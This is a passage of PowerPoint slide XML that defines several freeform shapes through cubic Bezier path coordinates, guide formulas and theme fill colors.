                    <a:pt x="17382" y="308774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61292" y="162131"/>
                    <a:pt x="164300" y="77883"/>
                    <a:pt x="307301" y="36172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="549118" y="-34401"/>
                    <a:pt x="775954" y="-1760"/>
                    <a:pt x="987878" y="134575"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1015572" y="152373"/>
                    <a:pt x="1044020" y="169002"/>
                    <a:pt x="1072126" y="186182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1172316" y="266375"/>
                    <a:pt x="1196916" y="378866"/>
                    <a:pt x="1201865" y="497953"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1211141" y="721834"/>
                    <a:pt x="1138026" y="1055938"/>
                    <a:pt x="1383966" y="1177431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1558714" y="1263809"/>
                    <a:pt x="1773662" y="1272192"/>
                    <a:pt x="1936179" y="1381247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082822" y="1479650"/>
                    <a:pt x="2159442" y="1640999"/>
                    <a:pt x="2169474" y="1814510"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2181294" y="2018120"/>
                    <a:pt x="2102063" y="2322195"/>
                    <a:pt x="1923672" y="2445955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1913708" y="2452895"/>
                    <a:pt x="1902988" y="2462310"/>
                    <a:pt x="1889588" y="2455026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1876945" y="2448154"/>
                    <a:pt x="1881068" y="2434823"/>
                    <a:pt x="1881136" y="2423965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1881755" y="2268458"/>
                    <a:pt x="1826231" y="2134459"/>
                    <a:pt x="1725629" y="2017708"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1721986" y="2013447"/>
                    <a:pt x="1717588" y="2009805"/>
                    <a:pt x="1713534" y="2005888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1616025" y="1893398"/>
                    <a:pt x="1477833" y="1833545"/>
                    <a:pt x="1348439" y="1764828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1124351" y="1645809"/>
                    <a:pt x="897790" y="1433609"/>
                    <a:pt x="868241" y="1167055"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="857727" y="1071881"/>
                    <a:pt x="870990" y="977944"/>
                    <a:pt x="882809" y="883939"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="892155" y="809380"/>
                    <a:pt x="883909" y="738120"/>
                    <a:pt x="843572" y="672839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="820208" y="635044"/>
                    <a:pt x="808113" y="630921"/>
                    <a:pt x="764616" y="640885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569664" y="685345"/>
                    <a:pt x="373888" y="724652"/>
                    <a:pt x="172202" y="717711"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent4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350C2C-4DDD-4DC0-B9A5-84216D8F2BD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6257829" y="1450227"/>
              <a:ext cx="2481297" cy="3814175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1767481 w 2481297"/>
                <a:gd name="connsiteY0" fmla="*/ 88356 h 3814175"/>
                <a:gd name="connsiteX1" fmla="*/ 2011772 w 2481297"/>
                <a:gd name="connsiteY1" fmla="*/ 291347 h 3814175"/>
                <a:gd name="connsiteX2" fmla="*/ 2177312 w 2481297"/>
                <a:gd name="connsiteY2" fmla="*/ 372434 h 3814175"/>
                <a:gd name="connsiteX3" fmla="*/ 2427925 w 2481297"/>
                <a:gd name="connsiteY3" fmla="*/ 553092 h 3814175"/>
                <a:gd name="connsiteX4" fmla="*/ 2480631 w 2481297"/>
                <a:gd name="connsiteY4" fmla="*/ 927465 h 3814175"/>
                <a:gd name="connsiteX5" fmla="*/ 2457748 w 2481297"/>
                <a:gd name="connsiteY5" fmla="*/ 1130456 h 3814175"/>
                <a:gd name="connsiteX6" fmla="*/ 2367728 w 2481297"/>
                <a:gd name="connsiteY6" fmla="*/ 1350214 h 3814175"/>
                <a:gd name="connsiteX7" fmla="*/ 2005106 w 2481297"/>
                <a:gd name="connsiteY7" fmla="*/ 2207121 h 3814175"/>
                <a:gd name="connsiteX8" fmla="*/ 2136769 w 2481297"/>
                <a:gd name="connsiteY8" fmla="*/ 2751844 h 3814175"/>
                <a:gd name="connsiteX9" fmla="*/ 2345601 w 2481297"/>
                <a:gd name="connsiteY9" fmla="*/ 3290039 h 3814175"/>
                <a:gd name="connsiteX10" fmla="*/ 2297086 w 2481297"/>
                <a:gd name="connsiteY10" fmla="*/ 3600985 h 3814175"/>
                <a:gd name="connsiteX11" fmla="*/ 2165905 w 2481297"/>
                <a:gd name="connsiteY11" fmla="*/ 3796143 h 3814175"/>
                <a:gd name="connsiteX12" fmla="*/ 1975558 w 2481297"/>
                <a:gd name="connsiteY12" fmla="*/ 3813459 h 3814175"/>
                <a:gd name="connsiteX13" fmla="*/ 1596788 w 2481297"/>
                <a:gd name="connsiteY13" fmla="*/ 3684202 h 3814175"/>
                <a:gd name="connsiteX14" fmla="*/ 1182077 w 2481297"/>
                <a:gd name="connsiteY14" fmla="*/ 3410775 h 3814175"/>
                <a:gd name="connsiteX15" fmla="*/ 709095 w 2481297"/>
                <a:gd name="connsiteY15" fmla="*/ 3174181 h 3814175"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 2481297"/>
                <a:gd name="connsiteY16" fmla="*/ 3108762 h 3814175"/>
                <a:gd name="connsiteX17" fmla="*/ 86447 w 2481297"/>
                <a:gd name="connsiteY17" fmla="*/ 3004655 h 3814175"/>
                <a:gd name="connsiteX18" fmla="*/ 156401 w 2481297"/>
                <a:gd name="connsiteY18" fmla="*/ 2895120 h 3814175"/>
                <a:gd name="connsiteX19" fmla="*/ 503630 w 2481297"/>
                <a:gd name="connsiteY19" fmla="*/ 1670987 h 3814175"/>
                <a:gd name="connsiteX20" fmla="*/ 503630 w 2481297"/>
                <a:gd name="connsiteY20" fmla="*/ 1612784 h 3814175"/>
                <a:gd name="connsiteX21" fmla="*/ 503836 w 2481297"/>
                <a:gd name="connsiteY21" fmla="*/ 1158287 h 3814175"/>
                <a:gd name="connsiteX22" fmla="*/ 589664 w 2481297"/>
                <a:gd name="connsiteY22" fmla="*/ 822602 h 3814175"/>
                <a:gd name="connsiteX23" fmla="*/ 952973 w 2481297"/>
                <a:gd name="connsiteY23" fmla="*/ 290591 h 3814175"/>
                <a:gd name="connsiteX24" fmla="*/ 1200425 w 2481297"/>
                <a:gd name="connsiteY24" fmla="*/ 100038 h 3814175"/>
                <a:gd name="connsiteX25" fmla="*/ 1504775 w 2481297"/>
                <a:gd name="connsiteY25" fmla="*/ 6307 h 3814175"/>
                <a:gd name="connsiteX26" fmla="*/ 1526077 w 2481297"/>
                <a:gd name="connsiteY26" fmla="*/ 95228 h 3814175"/>
                <a:gd name="connsiteX27" fmla="*/ 1554320 w 2481297"/>
                <a:gd name="connsiteY27" fmla="*/ 128350 h 3814175"/>
                <a:gd name="connsiteX28" fmla="*/ 1725289 w 2481297"/>
                <a:gd name="connsiteY28" fmla="*/ 150545 h 3814175"/>
                <a:gd name="connsiteX29" fmla="*/ 1767481 w 2481297"/>
                <a:gd name="connsiteY29" fmla="*/ 88356 h 381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1297" h="3814175">
                  <a:moveTo>
                    <a:pt x="1767481" y="88356"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1842589" y="163602"/>
                    <a:pt x="1919965" y="236030"/>
                    <a:pt x="2011772" y="291347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2064684" y="323232"/>
                    <a:pt x="2119727" y="349963"/>
                    <a:pt x="2177312" y="372434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2277159" y="411397"/>
                    <a:pt x="2354672" y="476816"/>
                    <a:pt x="2427925" y="553092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2470667" y="680082"/>
                    <a:pt x="2473691" y="812363"/>
                    <a:pt x="2480631" y="927465"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2484548" y="992471"/>
                    <a:pt x="2470461" y="1066411"/>
                    <a:pt x="2457748" y="1130456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2445173" y="1193745"/>
                    <a:pt x="2375975" y="1333997"/>
                    <a:pt x="2367728" y="1350214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2223628" y="1633330"/>
                    <a:pt x="2069082" y="1893082"/>
                    <a:pt x="2005106" y="2207121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1966693" y="2395544"/>
                    <a:pt x="2034930" y="2594412"/>
                    <a:pt x="2136769" y="2751844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2250565" y="2927692"/>
                    <a:pt x="2346288" y="3069868"/>
                    <a:pt x="2345601" y="3290039"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2345257" y="3395451"/>
                    <a:pt x="2326360" y="3499971"/>
                    <a:pt x="2297086" y="3600985"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2276266" y="3672795"/>
                    <a:pt x="2259429" y="3784736"/>
                    <a:pt x="2165905" y="3796143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2102685" y="3803839"/>
                    <a:pt x="2040220" y="3817445"/>
                    <a:pt x="1975558" y="3813459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837230" y="3804870"/>
                    <a:pt x="1714294" y="3752576"/>
                    <a:pt x="1596788" y="3684202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1453511" y="3600779"/>
                    <a:pt x="1321299" y="3500452"/>
                    <a:pt x="1182077" y="3410775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1033029" y="3314708"/>
                    <a:pt x="878965" y="3228605"/>
                    <a:pt x="709095" y="3174181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="483290" y="3097149"/>
                    <a:pt x="236251" y="3079351"/>
                    <a:pt x="0" y="3108762"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23914" y="3054338"/>
                    <a:pt x="62533" y="3028913"/>
                    <a:pt x="86447" y="3004655"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121080" y="2969472"/>
                    <a:pt x="136679" y="2939442"/>
                    <a:pt x="156401" y="2895120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324140" y="2518754"/>
                    <a:pt x="487138" y="2085491"/>
                    <a:pt x="503630" y="1670987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="504386" y="1651609"/>
                    <a:pt x="503630" y="1632231"/>
                    <a:pt x="503630" y="1612784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="498133" y="1405051"/>
                    <a:pt x="513594" y="1343205"/>
                    <a:pt x="503836" y="1158287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487963" y="1038924"/>
                    <a:pt x="534897" y="926365"/>
                    <a:pt x="589664" y="822602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="690129" y="632254"/>
                    <a:pt x="812240" y="453452"/>
                    <a:pt x="952973" y="290591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1035503" y="225791"/>
                    <a:pt x="1108138" y="152401"/>
                    <a:pt x="1200425" y="100038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1224682" y="86294"/>
                    <a:pt x="1496803" y="-27708"/>
                    <a:pt x="1504775" y="6307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1511715" y="35993"/>
                    <a:pt x="1517968" y="65817"/>
                    <a:pt x="1526077" y="95228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1530131" y="109865"/>
                    <a:pt x="1540507" y="121890"/>
                    <a:pt x="1554320" y="128350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1608675" y="153912"/>
                    <a:pt x="1664817" y="167793"/>
                    <a:pt x="1725289" y="150545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1757861" y="141200"/>
                    <a:pt x="1773804" y="122852"/>
                    <a:pt x="1767481" y="88356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64FF39-E2E1-43BB-976F-7C78E32E177B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5682385" y="4624339"/>
              <a:ext cx="2800721" cy="1510340"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1284608 w 2800721"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1510340"/>
                <a:gd name="connsiteX1" fmla="*/ 1757590 w 2800721"/>
                <a:gd name="connsiteY1" fmla="*/ 236594 h 1510340"/>
                <a:gd name="connsiteX2" fmla="*/ 2172301 w 2800721"/>
                <a:gd name="connsiteY2" fmla="*/ 510021 h 1510340"/>
                <a:gd name="connsiteX3" fmla="*/ 2551071 w 2800721"/>
                <a:gd name="connsiteY3" fmla="*/ 639278 h 1510340"/>
                <a:gd name="connsiteX4" fmla="*/ 2741418 w 2800721"/>
                <a:gd name="connsiteY4" fmla="*/ 621962 h 1510340"/>
                <a:gd name="connsiteX5" fmla="*/ 2449300 w 2800721"/>
                <a:gd name="connsiteY5" fmla="*/ 835260 h 1510340"/>
                <a:gd name="connsiteX6" fmla="*/ 2295854 w 2800721"/>
                <a:gd name="connsiteY6" fmla="*/ 882950 h 1510340"/>
                <a:gd name="connsiteX7" fmla="*/ 2533548 w 2800721"/>
                <a:gd name="connsiteY7" fmla="*/ 895732 h 1510340"/>
                <a:gd name="connsiteX8" fmla="*/ 2663561 w 2800721"/>
                <a:gd name="connsiteY8" fmla="*/ 901504 h 1510340"/>
                <a:gd name="connsiteX9" fmla="*/ 2714480 w 2800721"/>
                <a:gd name="connsiteY9" fmla="*/ 938199 h 1510340"/>
                <a:gd name="connsiteX10" fmla="*/ 2727537 w 2800721"/>
                <a:gd name="connsiteY10" fmla="*/ 965617 h 1510340"/>
                <a:gd name="connsiteX11" fmla="*/ 2787596 w 2800721"/>
                <a:gd name="connsiteY11" fmla="*/ 1174037 h 1510340"/>
                <a:gd name="connsiteX12" fmla="*/ 2800721 w 2800721"/>
                <a:gd name="connsiteY12" fmla="*/ 1338684 h 1510340"/>
                <a:gd name="connsiteX13" fmla="*/ 2797148 w 2800721"/>
                <a:gd name="connsiteY13" fmla="*/ 1370225 h 1510340"/>
                <a:gd name="connsiteX14" fmla="*/ 2777770 w 2800721"/>
                <a:gd name="connsiteY14" fmla="*/ 1444303 h 1510340"/>
                <a:gd name="connsiteX15" fmla="*/ 2731454 w 2800721"/>
                <a:gd name="connsiteY15" fmla="*/ 1447327 h 1510340"/>
                <a:gd name="connsiteX16" fmla="*/ 2736127 w 2800721"/>
                <a:gd name="connsiteY16" fmla="*/ 1455366 h 1510340"/>
                <a:gd name="connsiteX17" fmla="*/ 2712694 w 2800721"/>
                <a:gd name="connsiteY17" fmla="*/ 1459352 h 1510340"/>
                <a:gd name="connsiteX18" fmla="*/ 2329388 w 2800721"/>
                <a:gd name="connsiteY18" fmla="*/ 1474676 h 1510340"/>
                <a:gd name="connsiteX19" fmla="*/ 2282798 w 2800721"/>
                <a:gd name="connsiteY19" fmla="*/ 1510340 h 1510340"/>
                <a:gd name="connsiteX20" fmla="*/ 2243285 w 2800721"/>
                <a:gd name="connsiteY20" fmla="*/ 1473027 h 1510340"/>
                <a:gd name="connsiteX21" fmla="*/ 1739381 w 2800721"/>
                <a:gd name="connsiteY21" fmla="*/ 1467804 h 1510340"/>
                <a:gd name="connsiteX22" fmla="*/ 1309690 w 2800721"/>
                <a:gd name="connsiteY22" fmla="*/ 1440455 h 1510340"/>
                <a:gd name="connsiteX23" fmla="*/ 953459 w 2800721"/>
                <a:gd name="connsiteY23" fmla="*/ 1402386 h 1510340"/>
                <a:gd name="connsiteX24" fmla="*/ 538543 w 2800721"/>
                <a:gd name="connsiteY24" fmla="*/ 1321299 h 1510340"/>
                <a:gd name="connsiteX25" fmla="*/ 121634 w 2800721"/>
                <a:gd name="connsiteY25" fmla="*/ 1145863 h 1510340"/>
                <a:gd name="connsiteX26" fmla="*/ 3166 w 2800721"/>
                <a:gd name="connsiteY26" fmla="*/ 976750 h 1510340"/>
                <a:gd name="connsiteX27" fmla="*/ 6945 w 2800721"/>
                <a:gd name="connsiteY27" fmla="*/ 823235 h 1510340"/>
                <a:gd name="connsiteX28" fmla="*/ 220519 w 2800721"/>
                <a:gd name="connsiteY28" fmla="*/ 387566 h 1510340"/>
                <a:gd name="connsiteX29" fmla="*/ 544247 w 2800721"/>
                <a:gd name="connsiteY29" fmla="*/ 175161 h 1510340"/>
                <a:gd name="connsiteX30" fmla="*/ 1051931 w 2800721"/>
                <a:gd name="connsiteY30" fmla="*/ 31060 h 1510340"/>
                <a:gd name="connsiteX31" fmla="*/ 1284608 w 2800721"/>
                <a:gd name="connsiteY31" fmla="*/ 0 h 151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00721" h="1510340">
                  <a:moveTo>
                    <a:pt x="1284608" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1454546" y="54424"/>
                    <a:pt x="1608542" y="140527"/>
                    <a:pt x="1757590" y="236594"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1896812" y="326270"/>
                    <a:pt x="2028955" y="426666"/>
                    <a:pt x="2172301" y="510021"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2289807" y="578395"/>
                    <a:pt x="2412743" y="630688"/>
                    <a:pt x="2551071" y="639278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2615733" y="643264"/>
                    <a:pt x="2678129" y="629658"/>
                    <a:pt x="2741418" y="621962"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2675037" y="735483"/>
                    <a:pt x="2566051" y="790800"/>
                    <a:pt x="2449300" y="835260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2399411" y="854295"/>
                    <a:pt x="2347735" y="867626"/>
                    <a:pt x="2295854" y="882950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2375085" y="887211"/>
                    <a:pt x="2454316" y="891540"/>
                    <a:pt x="2533548" y="895732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2576909" y="898068"/>
                    <a:pt x="2620269" y="902603"/>
                    <a:pt x="2663561" y="901504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2692766" y="900748"/>
                    <a:pt x="2707403" y="911399"/>
                    <a:pt x="2714480" y="938199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2717023" y="947820"/>
                    <a:pt x="2723070" y="956478"/>
                    <a:pt x="2727537" y="965617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2748015" y="1034953"/>
                    <a:pt x="2770760" y="1103465"/>
                    <a:pt x="2787596" y="1174037"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2800652" y="1228942"/>
                    <a:pt x="2790551" y="1284329"/>
                    <a:pt x="2800721" y="1338684"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2787184" y="1347549"/>
                    <a:pt x="2797079" y="1360124"/>
                    <a:pt x="2797148" y="1370225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2797354" y="1397094"/>
                    <a:pt x="2790620" y="1422382"/>
                    <a:pt x="2777770" y="1444303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2766569" y="1463406"/>
                    <a:pt x="2745747" y="1442035"/>
                    <a:pt x="2731454" y="1447327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2720528" y="1451381"/>
                    <a:pt x="2736195" y="1451312"/>
                    <a:pt x="2736127" y="1455366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2728293" y="1456741"/>
                    <a:pt x="2720596" y="1458665"/>
                    <a:pt x="2712694" y="1459352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2585223" y="1471240"/>
                    <a:pt x="2457340" y="1475569"/>
                    <a:pt x="2329388" y="1474676"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2301558" y="1474470"/>
                    <a:pt x="2283279" y="1478662"/>
                    <a:pt x="2282798" y="1510340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2286303" y="1480173"/>
                    <a:pt x="2272490" y="1473302"/>
                    <a:pt x="2243285" y="1473027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2075339" y="1471309"/>
                    <a:pt x="1907394" y="1476875"/>
                    <a:pt x="1739381" y="1467804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1596035" y="1460039"/>
                    <a:pt x="1452897" y="1450556"/>
                    <a:pt x="1309690" y="1440455"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1190396" y="1432003"/>
                    <a:pt x="1071584" y="1418672"/>
                    <a:pt x="953459" y="1402386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="813963" y="1383144"/>
                    <a:pt x="674879" y="1358200"/>
                    <a:pt x="538543" y="1321299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391831" y="1281580"/>
                    <a:pt x="245738" y="1239388"/>
                    <a:pt x="121634" y="1145863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63912" y="1102365"/>
                    <a:pt x="12717" y="1051995"/>
                    <a:pt x="3166" y="976750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3225" y="926242"/>
                    <a:pt x="1104" y="874635"/>
                    <a:pt x="6945" y="823235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26392" y="652060"/>
                    <a:pt x="99576" y="507066"/>
                    <a:pt x="220519" y="387566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313493" y="295760"/>
                    <a:pt x="423235" y="226492"/>
                    <a:pt x="544247" y="175161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="707588" y="105825"/>
                    <a:pt x="877320" y="60471"/>
                    <a:pt x="1051931" y="31060"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1129101" y="17935"/>
                    <a:pt x="1206545" y="6872"/>
                    <a:pt x="1284608" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1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E6148D2-A48F-481A-9EF0-46E6B77C76B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8409784" y="5478840"/>
              <a:ext cx="1181533" cy="695008"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 73184 w 1181533"/>
                <a:gd name="connsiteY0" fmla="*/ 484252 h 695008"/>
                <a:gd name="connsiteX1" fmla="*/ 60059 w 1181533"/>
                <a:gd name="connsiteY1" fmla="*/ 319605 h 695008"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 1181533"/>
                <a:gd name="connsiteY2" fmla="*/ 111185 h 695008"/>
                <a:gd name="connsiteX3" fmla="*/ 274389 w 1181533"/>
                <a:gd name="connsiteY3" fmla="*/ 81568 h 695008"/>
                <a:gd name="connsiteX4" fmla="*/ 514076 w 1181533"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 695008"/>
                <a:gd name="connsiteX5" fmla="*/ 678997 w 1181533"/>
                <a:gd name="connsiteY5" fmla="*/ 85416 h 695008"/>
                <a:gd name="connsiteX6" fmla="*/ 1019424 w 1181533"/>
                <a:gd name="connsiteY6" fmla="*/ 413954 h 695008"/>
                <a:gd name="connsiteX7" fmla="*/ 1170327 w 1181533"/>
                <a:gd name="connsiteY7" fmla="*/ 608493 h 695008"/>
                <a:gd name="connsiteX8" fmla="*/ 1157820 w 1181533"/>
                <a:gd name="connsiteY8" fmla="*/ 695008 h 695008"/>
                <a:gd name="connsiteX9" fmla="*/ 922463 w 1181533"/>
                <a:gd name="connsiteY9" fmla="*/ 574890 h 695008"/>
                <a:gd name="connsiteX10" fmla="*/ 585816 w 1181533"/>
                <a:gd name="connsiteY10" fmla="*/ 506929 h 695008"/>
                <a:gd name="connsiteX11" fmla="*/ 227180 w 1181533"/>
                <a:gd name="connsiteY11" fmla="*/ 489475 h 695008"/>
                <a:gd name="connsiteX12" fmla="*/ 118057 w 1181533"/>
                <a:gd name="connsiteY12" fmla="*/ 495384 h 695008"/>
                <a:gd name="connsiteX13" fmla="*/ 73184 w 1181533"/>
                <a:gd name="connsiteY13" fmla="*/ 484252 h 69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533" h="695008">
                  <a:moveTo>
                    <a:pt x="73184" y="484252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63014" y="429896"/>
                    <a:pt x="73115" y="374510"/>
                    <a:pt x="60059" y="319605"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43224" y="249032"/>
                    <a:pt x="20478" y="180521"/>
                    <a:pt x="0" y="111185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91532" y="101702"/>
                    <a:pt x="183614" y="95998"/>
                    <a:pt x="274389" y="81568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358155" y="68236"/>
                    <a:pt x="440616" y="45972"/>
                    <a:pt x="514076" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577364" y="12438"/>
                    <a:pt x="630689" y="42811"/>
                    <a:pt x="678997" y="85416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797397" y="189935"/>
                    <a:pt x="912362" y="297890"/>
                    <a:pt x="1019424" y="413954"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1075222" y="474425"/>
                    <a:pt x="1131090" y="535034"/>
                    <a:pt x="1170327" y="608493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1187506" y="640584"/>
                    <a:pt x="1186132" y="669652"/>
                    <a:pt x="1157820" y="695008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1084637" y="644707"/>
                    <a:pt x="1008017" y="601278"/>
                    <a:pt x="922463" y="574890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="812446" y="541013"/>
                    <a:pt x="699681" y="522871"/>
                    <a:pt x="585816" y="506929"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466454" y="490162"/>
                    <a:pt x="346542" y="498477"/>
                    <a:pt x="227180" y="489475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191172" y="486726"/>
                    <a:pt x="154409" y="493185"/>
                    <a:pt x="118057" y="495384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104932" y="484252"/>
                    <a:pt x="85416" y="498820"/>
                    <a:pt x="73184" y="48425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13DBC2-004E-47E8-840E-F5241166C525}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8923860" y="5401642"/>
              <a:ext cx="996517" cy="938681"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 643745 w 996517"/>
                <a:gd name="connsiteY0" fmla="*/ 772207 h 938681"/>
                <a:gd name="connsiteX1" fmla="*/ 656252 w 996517"/>
                <a:gd name="connsiteY1" fmla="*/ 685691 h 938681"/>
                <a:gd name="connsiteX2" fmla="*/ 505348 w 996517"/>
                <a:gd name="connsiteY2" fmla="*/ 491152 h 938681"/>
                <a:gd name="connsiteX3" fmla="*/ 164922 w 996517"/>
